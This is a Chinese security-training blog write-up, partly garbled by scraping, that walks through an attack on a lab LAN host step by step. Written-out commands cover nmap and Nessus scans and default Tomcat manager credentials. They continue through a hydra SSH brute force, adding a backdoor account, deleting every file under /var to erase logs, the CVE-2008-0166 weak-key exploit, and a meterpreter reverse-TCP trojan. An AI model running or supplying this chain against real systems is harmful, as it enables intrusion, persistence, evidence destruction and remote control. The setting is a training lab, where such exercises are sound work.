局域网攻击演示(网安实训第五天)

 

局域网攻击演示

(1)信息收集

1对局域网进行主机发现扫描:php

nmap -sP 192.168.183.0/24html

2肯定攻击目标:本机ip地址为129,内网中还存在另外一台主机,ip为134,这就是咱们的目标,咱们对它进一步扫描。python

nmap -sV 192.168.183.134mysql

经过分析,咱们发现:目标主机开启大量可利用端口,ftp、ssh、telnet、smtp、mysql能够进行暴力破解,对方主机也开启了80端口,apache版本为2.2.8,php版本为5.2.4。linux

3放大招,使用nessus进行漏洞扫描。web

4在web扫描这里,我发现一些严重漏洞,这一个能够直接登录进去:sql


在这里,咱们发现如下信息:shell

  网址:http://192.168.183.134:8180/manager/htmlapache

  用户名:tomcatubuntu

  密码:tomcat

  网址:http://192.168.183.134:8180/host-manager/html

  用户名:tomcat

  密码:tomcat

  网址:http://192.168.183.134:8180/manager/status

  用户名:tomcat

  密码:tomcat

好像发现了新大陆,咱们继续寻找可用信息。

咱们发现管理员路径为admin:

好像没太大用,因为时间比较紧,咱们进行下一步。

(2)漏洞发现

经过分析上一步的扫描结果,分析获得如下信息:

找到漏洞编号:

CVE:  CVE-2009-3099CVE-2009-3548CVE-2010-0557CVE-2010-4094

继续寻找以前nessus的扫描结果,找到如下内容:

找到漏洞编号:

找到漏洞编号,cve-2008-0166

(3)渗透测试攻击

1暴力破解

在扫描期间,咱们先用hydra暴力破解试试,说不定运气好呢。

hydra -l root -P pass.txt –t 50 -e ns192.168.183.134 ssh

最开始使用上面命令,总是出现could not connect to target,查询了发现时由于线程开太多,被对方封了,因此改为1就能够正常运行。

hydra -l root -P pass.txt -t 1 -vV192.168.183.134 ssh

Success: 'root':'ubuntu' 仍是root权限,接下来,直接用xshell链接就行了。

(5)建立帐户

Useradd hack

Passwd hack

123

123

(6)清除日志文件

find   /var   -type   f  -exec   rm   -v   {}   \;

经过暴力破解,咱们已经得到对方shell,这样好像有点简单。我想继续根据以前获取的信息进行攻击。

2漏洞攻击

Msfconsole搜索,发现并无:

找到cve官网关于本漏洞的说明:

直接下载利用说明:

根据文档内容进行操做:

首先下载密钥文件:

上传到bt5并解压:

使用/pentest/exploits/exploitdb/searchsploit openssl搜索利用脚本文件:

咱们随表找一个,我这里使用python脚本。

find / -name 5720.py

进入/pentest/exploits/exploitdb/platforms/linux/remote/,并执行破解:

python 5720.py /root/rsa/2048192.168.183.134 root

结果以下:

执行:

ssh -lroot -p22 -i/root/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 192.168.183.134

成功获取对方shell。

(4)植入木马

生成木马:

msfpayload linux/x86/meterpreter/reverse_tcpLHOST=192.168.183.129 LPORT=55555 X > runme

将木立刻传至目标主机:

在攻击机中开启服务端:

若是目标机不当心运行了木马文件,攻击机便可得到反弹shell。

相关文章
相关标签/搜索